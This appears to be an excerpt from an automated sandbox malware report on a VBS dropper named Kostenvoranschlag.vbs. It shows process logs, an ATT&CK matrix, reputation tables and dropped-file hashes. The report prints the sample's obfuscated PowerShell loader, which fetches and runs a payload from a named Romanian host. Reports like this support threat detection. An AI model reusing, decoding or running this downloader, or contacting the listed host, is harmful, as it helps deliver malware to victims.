              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6541
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3292
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 7586
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2207
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7684 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4856 | Thread sleep time: -2767011611056431s >= -30000s
Source: powershell.exe, 00000004.00000002.1461760527.000001677BED3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWkk%SystemRoot%\system32\mswsock.dllsiSjusn InsdPolyo enrwMelosCykl endNOverT nd Gaar1Over0Atro.Mine0Unpr;Cha ,ikkW andiKancnrnne6Ro,e4Re r; K g Pr,xheim6Pawl4Feti; ora G ourCatavuneq:Peri1 Sem3Adve1 Pup.M,na0Aabe) Kli OveGPrd eWoolcSuppk PreoUni./Afma2Bane
Source: wscript.exe, 00000000.00000003.1259503516.000001E15F31F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\l
Source: PING.EXE, 00000002.00000002.1256963431.00000240627B9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllQQ
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation

              HIPS / PFW / Operating System Protection Evasion

Source: Yara match | File source: amsi64_7400.amsi.csv, type: OTHER
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 7400, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 8108, type: MEMORYSTR
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\PING.EXE ping Horm5zl_6637.6637.6637.657e
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Texguino Trave gastnderens Oppustes #>;$Nrtagenhedens='Forgrenedes';<#Samlemappens Slenderization Forepale Kiloers Bulmeurters #>;$Skuldrings11=$Varies+$host.UI; function Blaaklokkers($Kmnings246){If ($Skuldrings11) {$Koalabjrn++;}$Afvundnes=$Maleficium+$Kmnings246.'Length'-$Koalabjrn; for( $Katina=4;$Katina -lt $Afvundnes;$Katina+=5){$Tachytelic=$Katina;$Presartorial+=$Kmnings246[$Katina];$Harpalides='Glaeder';}$Presartorial;}function Fritidsklubberne($Fjernsynsapparat){ . ($Festsale) ($Fjernsynsapparat);}$Mellemstykket=Blaaklokkers 'C mpMUnaboRunbz.awaiComplAzuml RaaaWall/Amal ';$Arkipelagers='De d[ UncNP edEDaabtUn.e.Fjl.SNoncEMiljR Intv PiniE.toCSyllESyntPnervoLyriIafsyNOddet .olMK meaFavnnfra,A RungHabie KnorArga]Ingo:Kr g:AllesW.ipeBemacskftuBl,arSkovi CentUnlaY EstPObseRAriloMussTTrypOPaucCLageOTyp,lKerm Mist= Hy, ';$Mellemstykket+=Blaaklokkers 'Kors5Camb.P ls0Ande Paat( igiWRigsiSjusn InsdPolyo enrwMelosCykl endNOverT nd Gaar1Over0Atro.Mine0Unpr;Cha ,ikkW andiKancnrnne6Ro,e4Re r; K g Pr,xheim6Pawl4Feti; ora G ourCatavuneq:Peri1 Sem3Adve1 Pup.M,na0Aabe) Kli OveGPrd eWoolcSuppk PreoUni./Afma2Bane0 Fej1 ea0Skin0preo1,ros0Damp1Sand Ha FFlavi Sndr Ague DisfGorgoAbstx g n/Mari1 ave3 .al1Frem.gyna0Bes, ';$Arkipelagers+='Hold[StanNGroueA snTAbey.ProtS PrsEoprec inmU TwyrKretienertT anyRewrp SedrSleeoAylitGadeOProtCBaadoVeneLDepoTTtelY.ittpInteeToma] Sla ';$Furthy=Blaaklokkers 'InteU In sS edELunerM un-RemiaSpriGaikiEContN O eT rbe ';$Opvejningerne=Blaaklokkers ' ureh fsotBalltStabpStyls ati:Shet/Anno/,efowbejlw SubwFede.EpishHa doSt,nt OuteKloalOuabs ecie,usknBiseebefrcIndkaVarm. 
xplr Ai,oFasc/ MulPAv neFamirLyknsReprpStrieSnorcAnsatSnkeiVituv BesiUnu.s EcltHapu.RibbsWienn ybgpUni ';$Vellumy=Blaaklokkers 'Pseu>Adre ';$Festsale=Blaaklokkers 'tingiL rrEMediX,toc ';$Kua='Unfanged';$Arkipelagers+='thor:Unde:KdkrtPaloLRecosEnhe1S bs2 Hom ';$Befjelsernes='\Commandoes.Gre';Fritidsklubberne (Blaaklokkers 'Grav$Du,egTripL ndhoClosbTredARe aLSuff:DassBJuguA .eklOutlA Medr ,udaEli OKonk=vrne$WageeBurfnPr.tvSpri:F rsAshivPFi vpensodfi,aaDermTOtheaRega+ngle$,dspbgangE Ny f IltjGrenEReprL Ch s Fe ED varKnocNRegneL biS Irr ');Fritidsklubberne (Blaaklokkers ' Ci.$ torgSelvLB ddoFiloB indAKjruL Ko.:SucuS ,raaOv,rLLsenmKonceAitkdUdskIDoubg alt ermNBamlImruwN Fu GFormE elR.trasVrte=Rntg$shepOFe tpIlliv UbeEParajUnden AtoI OffnAbj gDespe LadrMononMissEAll . .erSfllePKanolR ali,almtKitt(nonb$BughV inE fr,L inylcageUUr sMVi.jyS nf)Regn ');Fritidsklubberne (Blaaklokkers $Arkipelagers);$Opvejningerne=$Salmedigtningers[0];$Autostandardization=(Blaaklokkers 'Moda$BobfgMuslLL viO omabAwarATes l for: .eisTvinnCommd Blae My rPoemlUn aeKmpem PranSndeiLokaNSt eGTrk,ESt iRDa enHundeBa f=UnheNRaasETeedWUn e-AdepO,edtb LuejSem.eSuppCSkrmtStil BesS PhoYClins Sint C.iEa epm Lyk. PernHar E ksiT A t. dewJgereImbuBLiviCPalelamini stvEBl gNUnaptTa.j Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
MITRE ATT&CK Matrix

Techniques are listed per tactic column as they appear in the report's matrix; a number in front of a technique is the badge the report shows next to that technique, techniques without a number are the matrix template's unmatched cells.

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
Resource Development: 221 Scripting; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: 1 Windows Management Instrumentation; 2 Command and Scripting Interpreter; 1 Exploitation for Client Execution; 2 PowerShell; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
Persistence: 221 Scripting; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Privilege Escalation: 11 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Defense Evasion: 1 Masquerading; 21 Virtualization/Sandbox Evasion; 11 Process Injection; 2 Obfuscated Files or Information; 1 Software Packing; 1 DLL Side-Loading; Compile After Delivery; Indicator Removal from Tools
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: 1 Security Software Discovery; 1 Process Discovery; 21 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 Remote System Discovery; 1 System Network Configuration Discovery; 1 File and Directory Discovery; 13 System Information Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
Collection: 1 Archive Collected Data; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Command and Control: 11 Encrypted Channel; 1 Ingress Tool Transfer; 2 Non-Application Layer Protocol; 13 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
Antivirus detection (sample)

Source | Detection | Scanner | Label | Link
Kostenvoranschlag.vbs | 8% | ReversingLabs | Script-WScript.Packed.Generic |

No Antivirus matches
URL reputation

Source | Detection | Scanner | Label | Link
http://nuget.org/NuGet.exe | 0% | URL Reputation | safe |
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe |
https://aka.ms/pscore6lB | 0% | URL Reputation | safe |
https://go.micro | 0% | URL Reputation | safe |
https://contoso.com/ | 0% | URL Reputation | safe |
https://nuget.org/nuget.exe | 0% | URL Reputation | safe |
https://contoso.com/License | 0% | URL Reputation | safe |
https://contoso.com/Icon | 0% | URL Reputation | safe |
https://aka.ms/pscore68 | 0% | URL Reputation | safe |
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
hotelseneca.ro | 185.181.240.15 | true | false | - | unknown
Horm5zl_6637.6637.6637.657e | unknown | unknown | true | - | unknown
www.hotelseneca.ro | unknown | unknown | true | - | unknown
Name | Malicious | Antivirus Detection | Reputation
https://www.hotelseneca.ro/Perspectivist.snp | false | - | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://nuget.org/NuGet.exe | powershell.exe, 00000004.00000002.1453020255.0000016773913000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2561543050.0000000005A5D000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://hotelseneca.ro | powershell.exe, 00000004.00000002.1391887473.0000016765994000.00000004.00000800.00020000.00000000.sdmp | false | - | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 0000000D.00000002.2543840351.0000000004B47000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://aka.ms/pscore6lB | powershell.exe, 0000000D.00000002.2543840351.00000000049F1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 0000000D.00000002.2543840351.0000000004B47000.00000004.00000800.00020000.00000000.sdmp | false | - | unknown
http://www.hotelseneca.ro | powershell.exe, 00000004.00000002.1391887473.0000016765994000.00000004.00000800.00020000.00000000.sdmp | false | - | unknown
https://go.micro | powershell.exe, 00000004.00000002.1391887473.000001676463C000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.hotelseneca.ro/Perspectivist.snpP | powershell.exe, 00000004.00000002.1391887473.0000016763AC7000.00000004.00000800.00020000.00000000.sdmp | false | - | unknown
https://contoso.com/ | powershell.exe, 0000000D.00000002.2561543050.0000000005A5D000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000004.00000002.1453020255.0000016773913000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2561543050.0000000005A5D000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.hotelseneca.ro/Perspectivist.snpXR | powershell.exe, 0000000D.00000002.2543840351.0000000004B47000.00000004.00000800.00020000.00000000.sdmp | false | - | unknown
https://contoso.com/License | powershell.exe, 0000000D.00000002.2561543050.0000000005A5D000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://crl.micro# | powershell.exe, 0000000D.00000002.2569380323.0000000007444000.00000004.00000020.00020000.00000000.sdmp | false | - | unknown
https://contoso.com/Icon | powershell.exe, 0000000D.00000002.2561543050.0000000005A5D000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.hotelseneca.ro/Perspectivist.snpmuim | powershell.exe, 00000004.00000002.1460713089.000001677BC95000.00000004.00000020.00020000.00000000.sdmp | false | - | unknown
https://aka.ms/pscore68 | powershell.exe, 00000004.00000002.1391887473.00000167638A1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000004.00000002.1391887473.00000167638A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2543840351.00000000049F1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://github.com/Pester/Pester | powershell.exe, 0000000D.00000002.2543840351.0000000004B47000.00000004.00000800.00020000.00000000.sdmp | false | - | unknown
http://crl.microsoftP | powershell.exe, 0000000D.00000002.2569380323.00000000073D0000.00000004.00000020.00020000.00000000.sdmp | false | - | unknown
https://www.hotelseneca.ro | powershell.exe, 00000004.00000002.1391887473.00000167658E3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1391887473.0000016763AC7000.00000004.00000800.00020000.00000000.sdmp | false | - | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
185.181.240.15 | hotelseneca.ro | Romania | 5588 | GTSCEGTSCentralEuropeAntelGermanyCZ | false
                                          Joe Sandbox version:41.0.0 Charoite
                                          Analysis ID:1541205
                                          Start date and time:2024-10-24 15:19:07 +02:00
                                          Joe Sandbox product:CloudBasic
                                          Overall analysis duration:0h 6m 12s
                                          Hypervisor based Inspection enabled:false
                                          Report type:full
                                          Cookbook file name:default.jbs
                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:20
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:0
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Analysis stop reason:Timeout
                                          Sample name:Kostenvoranschlag.vbs
                                          Detection:MAL
                                          Classification:mal100.troj.expl.evad.winVBS@9/7@2/1
                                          EGA Information:Failed
                                          HCA Information:
                                          • Successful, ratio: 88%
                                          • Number of executed functions: 55
                                          • Number of non-executed functions: 22
                                          Cookbook Comments:
                                          • Found application associated with file extension: .vbs
                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                          • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                          • Execution Graph export aborted for target powershell.exe, PID 7400 because it is empty
                                          • Execution Graph export aborted for target powershell.exe, PID 8108 because it is empty
• Not all processes were analyzed; the report is missing behavior information
                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                          • VT rate limit hit for: Kostenvoranschlag.vbs
Time | Type | Description
09:20:04 | API Interceptor | 73x Sleep call for process: powershell.exe modified
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
GTSCEGTSCentralEuropeAntelGermanyCZ | Szacunek IMP29575 za eksport z ostatniego kwartalu.vbs | Get hash | malicious | GuLoader | Browse | 188.241.183.203
GTSCEGTSCentralEuropeAntelGermanyCZ | atH4SE3Oi6.elf | Get hash | malicious | Mirai | Browse | 94.42.225.27
GTSCEGTSCentralEuropeAntelGermanyCZ | o2YUBeMZW6.elf | Get hash | malicious | Mirai | Browse | 62.168.37.157
GTSCEGTSCentralEuropeAntelGermanyCZ | 5tSAlF2WkT.elf | Get hash | malicious | Mirai | Browse | 62.168.37.162
GTSCEGTSCentralEuropeAntelGermanyCZ | ai3eCONS9Q.elf | Get hash | malicious | Mirai | Browse | 94.42.250.26
GTSCEGTSCentralEuropeAntelGermanyCZ | arm4.elf | Get hash | malicious | Mirai | Browse | 157.25.81.90
GTSCEGTSCentralEuropeAntelGermanyCZ | byte.arm5.elf | Get hash | malicious | Okiru | Browse | 212.38.198.222
GTSCEGTSCentralEuropeAntelGermanyCZ | O1CZjzItH1.vbs | Get hash | malicious | GuLoader | Browse | 31.14.12.249
GTSCEGTSCentralEuropeAntelGermanyCZ | Stima IMP87654 per l'esportazione dell'ultimo trimestre.vbs | Get hash | malicious | GuLoader | Browse | 188.241.183.45
GTSCEGTSCentralEuropeAntelGermanyCZ | la.bot.arm5.elf | Get hash | malicious | Unknown | Browse | 193.85.134.61
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
3b5074b1b5d032e5620f69f9f700ff0e | Szacunek IMP29575 za eksport z ostatniego kwartalu.vbs | Get hash | malicious | GuLoader | Browse | 185.181.240.15
3b5074b1b5d032e5620f69f9f700ff0e | kQyd2z80gD.exe | Get hash | malicious | DCRat | Browse | 185.181.240.15
3b5074b1b5d032e5620f69f9f700ff0e | PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe | Get hash | malicious | DarkCloud | Browse | 185.181.240.15
3b5074b1b5d032e5620f69f9f700ff0e | https://www.yola.com/es/zendesk-sso?return_to=http://york.iwill.app.br/ | Get hash | malicious | Unknown | Browse | 185.181.240.15
3b5074b1b5d032e5620f69f9f700ff0e | Produccion.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse | 185.181.240.15
3b5074b1b5d032e5620f69f9f700ff0e | xVmySfWfcW.exe | Get hash | malicious | Unknown | Browse | 185.181.240.15
3b5074b1b5d032e5620f69f9f700ff0e | 226999705-124613-sanlccjavap0004-67.exe | Get hash | malicious | Snake Keylogger | Browse | 185.181.240.15
3b5074b1b5d032e5620f69f9f700ff0e | LDlanZur0i.exe | Get hash | malicious | Unknown | Browse | 185.181.240.15
3b5074b1b5d032e5620f69f9f700ff0e | Fa1QSXjTZD.exe | Get hash | malicious | Unknown | Browse | 185.181.240.15
3b5074b1b5d032e5620f69f9f700ff0e | xxImTScxAq.exe | Get hash | malicious | Unknown | Browse | 185.181.240.15
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:data
                                          Category:modified
                                          Size (bytes):8003
                                          Entropy (8bit):4.840877972214509
                                          Encrypted:false
                                          SSDEEP:192:Dxoe5HVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9smzdcU6CDQpOR:J1VoGIpN6KQkj2qkjh4iUx5Uib4J
                                          MD5:106D01F562D751E62B702803895E93E0
                                          SHA1:CBF19C2392BDFA8C2209F8534616CCA08EE01A92
                                          SHA-256:6DBF75E0DB28A4164DB191AD3FBE37D143521D4D08C6A9CEA4596A2E0988739D
                                          SHA-512:81249432A532959026E301781466650DFA1B282D05C33E27D0135C0B5FD0F54E0AEEADA412B7E461D95A25D43750F802DE3D6878EF0B3E4AB39CC982279F4872
                                          Malicious:false
                                          Reputation:moderate, very likely benign file
                                          Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):64
                                          Entropy (8bit):1.1940658735648508
                                          Encrypted:false
                                          SSDEEP:3:Nlllulbnolz:NllUc
                                          MD5:F23953D4A58E404FCB67ADD0C45EB27A
                                          SHA1:2D75B5CACF2916C66E440F19F6B3B21DFD289340
                                          SHA-256:16F994BFB26D529E4C28ED21C6EE36D4AFEAE01CEEB1601E85E0E7FDFF4EFA8B
                                          SHA-512:B90BFEC26910A590A367E8356A20F32A65DB41C6C62D79CA0DDCC8D95C14EB48138DEC6B992A6E5C7B35CFF643063012462DA3E747B2AA15721FE2ECCE02C044
                                          Malicious:false
                                          Reputation:moderate, very likely benign file
                                          Preview:@...e................................................@..........
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                          Category:dropped
                                          Size (bytes):475360
                                          Entropy (8bit):5.845607994188485
                                          Encrypted:false
